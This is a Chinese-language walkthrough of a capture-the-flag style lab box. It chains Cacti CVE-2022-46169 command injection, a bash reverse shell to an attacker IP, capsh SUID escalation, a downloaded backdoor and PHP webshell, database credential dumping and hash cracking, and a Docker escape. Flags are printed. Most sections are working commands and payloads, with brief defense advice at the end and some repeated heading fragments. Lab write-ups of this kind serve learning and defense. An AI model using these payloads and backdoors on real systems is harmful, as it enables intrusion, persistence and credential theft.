Cacti RCE 到 Docker 逃逸完整渗透教学<\/h1>

1. 信息收集阶段<\/h2>

1.1 主机发现与端口扫描<\/h3>

使用以下命令检查目标主机是否在线并扫描开放端口：<\/p>

ip=<\/span>'10.10.11.211'<\/span>; 
<\/span><\/span>itf=<\/span>'tun0'<\/span>; 
<\/span><\/span>if<\/span> nmap -Pn -sn "<\/span>$ip"<\/span> | grep -q "Host is up"<\/span>; then<\/span> 
<\/span><\/span>    echo -e "\e[32m[+] Target <\/span>$ip is up, scanning ports...\e[0m"<\/span>; 
<\/span><\/span>    ports=<\/span>$(<\/span>sudo masscan -p1-65535,U:1-65535 "<\/span>$ip"<\/span> --rate=<\/span>1000<\/span> -e "<\/span>$itf"<\/span> | awk '\/open\/ {print $4}'<\/span> | cut -d '\/'<\/span> -f1 | sort -n | tr '\n'<\/span> ','<\/span> | sed 's\/,$\/\/'<\/span>)<\/span>;
<\/span><\/span>    if<\/span> [<\/span> -n "<\/span>$ports"<\/span> ]<\/span>; then<\/span> 
<\/span><\/span>        echo -e "\e[34m[+] Open ports found on <\/span>$ip: <\/span>$ports\e[0m"<\/span>; 
<\/span><\/span>        nmap -Pn -sV -sC -p "<\/span>$ports"<\/span> "<\/span>$ip"<\/span>; 
<\/span><\/span>    else<\/span> 
<\/span><\/span>        echo -e "\e[31m[!] No open ports found on <\/span>$ip.\e[0m"<\/span>; 
<\/span><\/span>    fi<\/span>; 
<\/span><\/span>else<\/span> 
<\/span><\/span>    echo -e "\e[31m[!] Target <\/span>$ip is unreachable, network is down.\e[0m"<\/span>; 
<\/span><\/span>fi<\/span>
<\/span><\/span><\/code><\/pre>扫描结果：<\/p>

22\/tcp: OpenSSH 8.2p1 Ubuntu<\/li>
80\/tcp: nginx 1.18.0 (Ubuntu) 运行 Cacti<\/li>
<\/ul>
2. Cacti RCE 漏洞利用 (CVE-2022-46169)<\/h2>
2.1 漏洞验证<\/h3>
使用curl验证漏洞是否存在：<\/p>
curl -G "http:\/\/10.10.11.211\/remote_agent.php"<\/span> \
<\/span><\/span><\/span><\/span>--data-urlencode "action=polldata"<\/span> \
<\/span><\/span><\/span><\/span>--data-urlencode "local_data_ids[0]=6"<\/span> \
<\/span><\/span><\/span><\/span>--data-urlencode "host_id=1"<\/span> \
<\/span><\/span><\/span><\/span>--data-urlencode "poller_id=%3Bping 10.10.16.28%3B"<\/span> \
<\/span><\/span><\/span><\/span>-H "X-Forwarded-For: 127.0.0.1"<\/span>
<\/span><\/span><\/code><\/pre>2.2 利用漏洞获取反向shell<\/h3>
使用公开的Python利用脚本：

https:\/\/github.com\/ariyaadinatha\/cacti-cve-2022-46169-exploit\/blob\/main\/cacti.py<\/p>
或者手动构造payload：<\/p>
curl -G "http:\/\/10.10.11.211\/remote_agent.php"<\/span> \
<\/span><\/span><\/span><\/span>--data-urlencode "action=polldata"<\/span> \
<\/span><\/span><\/span><\/span>--data-urlencode "local_data_ids[0]=6"<\/span> \
<\/span><\/span><\/span><\/span>--data-urlencode "host_id=1"<\/span> \
<\/span><\/span><\/span><\/span>--data-urlencode "poller_id=%3Bbash -c 'bash -i >& \/dev\/tcp\/10.10.16.28\/4444 0>&1'%3B"<\/span> \
<\/span><\/span><\/span><\/span>-H "X-Forwarded-For: 127.0.0.1"<\/span>
<\/span><\/span><\/code><\/pre>3. Docker容器内权限提升<\/h2>
3.1 检查SUID文件<\/h3>
发现capsh<\/code>具有SUID权限：<\/p>
find \/ -perm -4000 2>\/dev\/null | grep capsh
<\/span><\/span><\/code><\/pre>3.2 利用capsh提权<\/h3>
\/sbin\/capsh --gid=<\/span>0<\/span> --uid=<\/span>0<\/span> --
<\/span><\/span><\/code><\/pre>4. 持久化后门部署<\/h2>
4.1 使用Tyrant后门<\/h3>
下载并执行Tyrant后门：<\/p>
wget http:\/\/10.10.16.28\/tyrant
<\/span><\/span>chmod +x .\/tyrant
<\/span><\/span>.\/tyrant
<\/span><\/span><\/code><\/pre>4.2 部署Webshell<\/h3>
上传PHP webshell：<\/p>
<?<\/span>php<\/span>
<\/span><\/span>$uid =<\/span> isset<\/span>($_GET['uid'<\/span>]) ?<\/span> escapeshellarg<\/span>($_GET['uid'<\/span>]) :<\/span> ''<\/span>;
<\/span><\/span>$rhost =<\/span> isset<\/span>($_GET['rhost'<\/span>]) ?<\/span> escapeshellarg<\/span>($_GET['rhost'<\/span>]) :<\/span> ''<\/span>;
<\/span><\/span>$rport =<\/span> isset<\/span>($_GET['rport'<\/span>]) ?<\/span> escapeshellarg<\/span>($_GET['rport'<\/span>]) :<\/span> ''<\/span>;
<\/span><\/span>if<\/span> ($uid &&<\/span> $rhost &&<\/span> $rport) {
<\/span><\/span>    $command =<\/span> "\/tmp\/tyrant -uid <\/span>$uid<\/span> -rhost <\/span>$rhost<\/span> -rport <\/span>$rport<\/span>"<\/span>;
<\/span><\/span>    exec<\/span>($command, $output, $status);
<\/span><\/span>}
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>通过curl上传：<\/p>
curl http:\/\/10.10.16.28\/tyrant.txt > tyrant.php
<\/span><\/span><\/code><\/pre>触发后门：<\/p>
curl 'http:\/\/10.10.11.211\/tyrant.php?uid=0&rhost=10.10.16.28&rport=10032'<\/span>
<\/span><\/span><\/code><\/pre>5. 横向移动<\/h2>
5.1 数据库凭证获取<\/h3>
mysql -h db -u root -proot cacti -e 'select username,password from user_auth;'<\/span>
<\/span><\/span><\/code><\/pre>5.2 密码破解<\/h3>
将哈希保存到文件：<\/p>
echo -e '$2y$10$IhEA.Og8vrvwueM7VEDkUes3pwc3zaBbQ\/iuqMft\/llx8utpR1hjC\n$2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW\/MhFYK4C'<\/span> > hash
<\/span><\/span><\/code><\/pre>使用John the Ripper破解：<\/p>
john hash --wordlist=<\/span>\/usr\/share\/wordlists\/rockyou.txt
<\/span><\/span><\/code><\/pre>发现密码：funkymonkey<\/code><\/p>
5.3 SSH登录<\/h3>
ssh marcus@10.10.11.211
<\/span><\/span><\/code><\/pre>获取user flag：

7abf4f934a50a4d9c3165324c86c548f<\/code><\/p>
6. Docker逃逸与root权限提升<\/h2>
6.1 检查Docker版本<\/h3>
docker --version
<\/span><\/span><\/code><\/pre>确认版本低于20.10.9，存在漏洞<\/p>
6.2 查找挂载点<\/h3>
findmnt
<\/span><\/span><\/code><\/pre>6.3 容器内检查挂载<\/h3>
mount | grep '\/'<\/span>
<\/span><\/span><\/code><\/pre>6.4 利用Docker逃逸<\/h3>
找到容器在宿主机上的文件系统路径：<\/p>
\/var\/lib\/docker\/overlay2\/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1\/merged\/bin\/bash -p
<\/span><\/span><\/code><\/pre>6.5 获取root权限<\/h3>
chmod u+s \/bin\/bash
<\/span><\/span>\/bin\/bash -p
<\/span><\/span><\/code><\/pre>获取root flag：

e83ef03926819b6803798da32fcc3b26<\/code><\/p>
7. 关键工具与资源<\/h2>


Cacti RCE利用脚本<\/strong>:<\/p>

https:\/\/github.com\/ariyaadinatha\/cacti-cve-2022-46169-exploit<\/li>
<\/ul>
<\/li>

TRP00F提权工具<\/strong>:<\/p>

https:\/\/github.com\/MartinxMax\/trp00f<\/li>
<\/ul>
<\/li>

Tyrant后门工具<\/strong>:<\/p>

https:\/\/github.com\/MartinxMax\/Tyrant<\/li>
<\/ul>
<\/li>

密码破解字典<\/strong>:<\/p>

rockyou.txt<\/li>
<\/ul>
<\/li>
<\/ol>
8. 防御建议<\/h2>

及时更新Cacti到最新版本<\/li>
限制Docker容器权限<\/li>
定期审计SUID文件<\/li>
监控异常网络连接<\/li>
使用强密码策略<\/li>
更新Docker到最新版本<\/li>
<\/ol>

Cacti RCE 到 Docker 逃逸完整渗透教学<\/h1>

1. 信息收集阶段<\/h2>

2. Cacti RCE 漏洞利用 (CVE-2022-46169)<\/h2>

3. Docker容器内权限提升<\/h2>

4. 持久化后门部署<\/h2>

5. 横向移动<\/h2>

8. 防御建议<\/h2> 及时更新Cacti到最新版本<\/li> 限制Docker容器权限<\/li> 定期审计SUID文件<\/li> 监控异常网络连接<\/li> 使用强密码策略<\/li> 更新Docker到最新版本<\/li> <\/ol>

8. 防御建议<\/h2>

及时更新Cacti到最新版本<\/li>
限制Docker容器权限<\/li>
定期审计SUID文件<\/li>
监控异常网络连接<\/li>
使用强密码策略<\/li>
更新Docker到最新版本<\/li> <\/ol>